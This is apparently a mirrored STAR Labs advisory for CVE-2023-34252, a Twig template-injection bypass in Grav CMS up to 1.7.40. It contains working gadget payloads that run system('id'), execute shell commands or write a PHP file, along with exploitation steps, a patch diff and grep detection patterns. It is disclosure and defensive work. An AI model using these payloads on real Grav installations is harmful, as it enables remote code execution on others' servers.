CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
82.0%
Hi,
actually we have sent the bug report to [email protected] on 27th March 2023 and on 10th April 2023.
Product | Grav CMS |
---|---|
Vendor | Grav |
Severity | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution |
Affected Versions | <= v1.7.40 (Commit 685d762) (Latest version as of writing) |
Tested Versions | v1.7.40 |
Internal Identifier | STAR-2023-0007 |
CVE Identifier | TBD |
CWE(s) | CWE-20: Improper Input Validation, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |
Base Score: 7.2 (High) Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Metric | Value |
---|---|
Attack Vector (AV) | Network |
Attack Complexity (AC) | Low |
Privileges Required (PR) | High |
User Interaction (UI) | None |
Scope (S) | Unchanged |
Confidentiality (C) | High |
Integrity (I) | High |
Availability (A) | High |
Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.
There is a logic flaw in the GravExtension.filterFilter()
function whereby validation against a denylist of unsafe functions is only performed when the argument passed to filter is a string. However, passing an array as a callable argument allows the validation check to be skipped. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.
The vulnerability can be found in the GravExtension.filterFilter()
function declared in /system/src/Grav/Common/Twig/Extension/GravExtension.php
:
...
class GravExtension extends AbstractExtension implements GlobalsInterface
{
...
/**
* Return a list of all filters.
*
* @return array
*/
public function getFilters(): array
{
return [
...
// Security fix
new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]),
];
}
...
/**
* @param Environment $env
* @param array $array
* @param callable|string $arrow
* @return array|CallbackFilterIterator
* @throws RuntimeError
*/
function filterFilter(Environment $env, $array, $arrow)
{
if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { // [1]
throw new RuntimeError('Twig |filter("' . $arrow . '") is not allowed.');
}
return \twig_array_filter($env, $array, $arrow); // [2]
}
}
At [1], the $arrow
parameter contains the argument supplied to the filter. For example, it may refer to "funcname"
in {{ array|filter("funcname") }}
or the closure (a.k.a. arrow function) el => el != 'exclude'
in {{ array|filter(el => el != 'exclude') }}
. Observe that Utils::isDangerousFunction($arrow)
is only invoked if $arrow
is a string. As such, non-string arguments may be passed to twig_array_filter()
at [2] due to the absence of type enforcement at [1].
The implementation of the twig_array_filter()
function can be found in /src/Extension/CoreExtension.php within Twig’s codebase:
function twig_array_filter(Environment $env, $array, $arrow)
{
if (!twig_test_iterable($array)) {
throw new RuntimeError(sprintf('The "filter" filter expects an array or "Traversable", got "%s".', \is_object($array) ? \get_class($array) : \gettype($array)));
}
if (!$arrow instanceof Closure && $env->hasExtension('\Twig\Extension\SandboxExtension') && $env->getExtension('\Twig\Extension\SandboxExtension')->isSandboxed()) { // [3]
throw new RuntimeError('The callable passed to "filter" filter must be a Closure in sandbox mode.');
}
if (\is_array($array)) {
if (\PHP_VERSION_ID >= 50600) {
return array_filter($array, $arrow, \ARRAY_FILTER_USE_BOTH); // [4]
}
return array_filter($array, $arrow);
}
// the IteratorIterator wrapping is needed as some internal PHP classes are \Traversable but do not implement \Iterator
return new \CallbackFilterIterator(new \IteratorIterator($array), $arrow);
}
At [3], a runtime error is thrown if $arrow
is not a closure and Twig sandbox is enabled. However, since Grav does not use the Twig Sandbox extension, the check passes successfully even when $arrow
is not a closure. Subsequently at [4], array_filter()
is invoked with the user-controlled $array
input and $arrow
parameter.
Note that the method signature of array_filter()
is as follows:
array_filter(array $array, ?callable $callback = null, int $mode = 0): array
A common mistake that developers make is assuming that the callable
type refers to a string
type. This is untrue, and it is well documented in the PHP Manual:
> A method of an instantiated object is passed as an array containing an object at index 0 and the method name at index 1. Accessing protected and private methods from within a class is allowed.
> Static class methods can also be passed without instantiating an object of that class by either, passing the class name instead of an object at index 0, or passing ClassName::methodName
.
This means that all of the following method calls are valid:
// Type 1: Simple callback -- invokes system("id")
array_filter(array("id"), "system");
// Type 2: Static class method call -- invokes Class::staticMethod($arg)
array_filter(array($arg), array("Class", "staticMethod"));
array_filter(array($arg), array("Class::staticMethod")); // same as above
// Type 3: Object method call -- invokes $obj->method($arg)
array_filter(array($arg), array($obj, "method"));
Going back to [1], if $arrow
is an array
instead of a string
or closure
, the validation check to prevent invocation of unsafe functions is completely skipped. Multiple static class methods within Grav’s codebase and its dependencies were found to be suitable gadgets for achieving for remote code execution:
// Gadget 1: Using \Grav\Common\Utils::arrayFilterRecursive() within Grav's codebase to invoke system("id"):
{% set id = {'id': 0} %}
{{ {'system': id} | filter('\\Grav\\Common\\Utils', 'arrayFilterRecursive') }}
// Gadget 2: Using \Symfony\Component\VarDumper\Vardumper::setHandler() and \Symfony\Component\VarDumper\Vardumper::dump() to invoke system("id"):
{{ ['system'] | filter(['\\Symfony\\Component\\VarDumper\\VarDumper', 'setHandler'])}}
{{ ['id'] | filter(['\\Symfony\\Component\\VarDumper\\VarDumper', 'dump']) }}
// Gadget 3: Using \RocketTheme\Toolbox\File\File::instance() in Grav's default theme to perform arbitrary file write to rce.php in the webroot:
{{ (['rce.php'] | map(['\\RocketTheme\\Toolbox\\File\\File', 'instance']))[0].save('<?php echo phpinfo(); ') }}
// Gadget 4: Using \Symfony\Component\Process\Process::fromShellCommandline() to invoke system("id"):
{{ {'/':'sleep 3'} | map(['\\Symfony\\Component\\Process\\Process', 'fromShellCommandline']) | map(e => e.run()) | print_r }}
This vulnerability can be exploited if the attacker has access to:
Accounts > Add
, and ensure that the following permissions are assigned when creating a new low-privileged user:
http://<grav_installation>/admin/pages/home
.Advanced
tab and select the checkbox beside Twig
to ensure that Twig processing is enabled for the modified webpage.Content
tab, insert the following payload within the editor:// Gadget 1: Using \Grav\Common\Utils::arrayFilterRecursive() within Grav's codebase to invoke system("id"):
{% set id = {'id': 0} %}
{{ {'system': id} | filter('\\Grav\\Common\\Utils', 'arrayFilterRecursive') }}
id
shell command is returned in the preview.Patch the logic flaw in the GravExtension.filterFilter()
function declared in /system/src/Grav/Common/Twig/Extension/GravExtension.php
to ensure that the $arrow
paramater passed to the filterFilter()
function must either be a string
or an arrow function as such:
...
class GravExtension extends AbstractExtension implements GlobalsInterface
{
...
/**
* @param Environment $env
* @param array $array
* @param callable|string $arrow
* @return array|CallbackFilterIterator
* @throws RuntimeError
*/
function filterFilter(Environment $env, $array, $arrow)
{
- if (is_string($arrow) && Utils::isDangerousFunction($arrow)) {
+ if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {
throw new RuntimeError('Twig |filter("' . $arrow . '") is not allowed.');
}
return \twig_array_filter($env, $array, $arrow);
}
}
Utils::isDangerousFunction()
in /system/src/Grav/Common/Utils.php should also be patched to prevent static class methods from being invoked. For example,
...
abstract class Utils
{
...
/**
* @param string $name
* @return bool
*/
public static function isDangerousFunction(string $name): bool
{
...
+ if (is_array($name) || strpos($name, ":") !== false) {
+ return false;
+ }
if (in_array($name, $commandExecutionFunctions)) {
return true;
}
if (in_array($name, $codeExecutionFunctions)) {
return true;
}
if (isset($callbackFunctions[$name])) {
return true;
}
if (in_array($name, $informationDiscosureFunctions)) {
return true;
}
if (in_array($name, $otherFunctions)) {
return true;
}
return static::isFilesystemFunction($name);
}
...
}
End users should also ensure that twig.undefined_functions
and twig.undefined_filters
properties in /path/to/webroot/system/config/system.yaml
configuration file are set to false
to disallow Twig from treating undefined filters/functions as PHP functions and executing them.
The following strategies may be used to detect potential exploitation attempts.
grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' /path/to/webroot/user/pages/
grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' --include '*.doctrinecache.data' /path/to/webroot/cache/
grep -Priz -e 'twig_array_(filter|map|reduce)' /path/to/webroot/cache/twig/
grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' /path/to/webroot/cache/compiled/files/
Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at /path/to/webroot/logs/grav.log
by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.
Ngo Wei Lin (@Creastery) & Wang Hengyue (@w_hy_04) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:
GravExtension.filterFilter()
and to achieve remote code execution via usage of fully-qualified names, supplied as arrays of strings, when referencing callables. This is a bypass of CVE-2022-2073.github.com/advisories/GHSA-96xv-rmwj-6p9w
github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698
github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074
github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec
github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b
github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8
github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5
github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w
nvd.nist.gov/vuln/detail/CVE-2023-34252
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
82.0%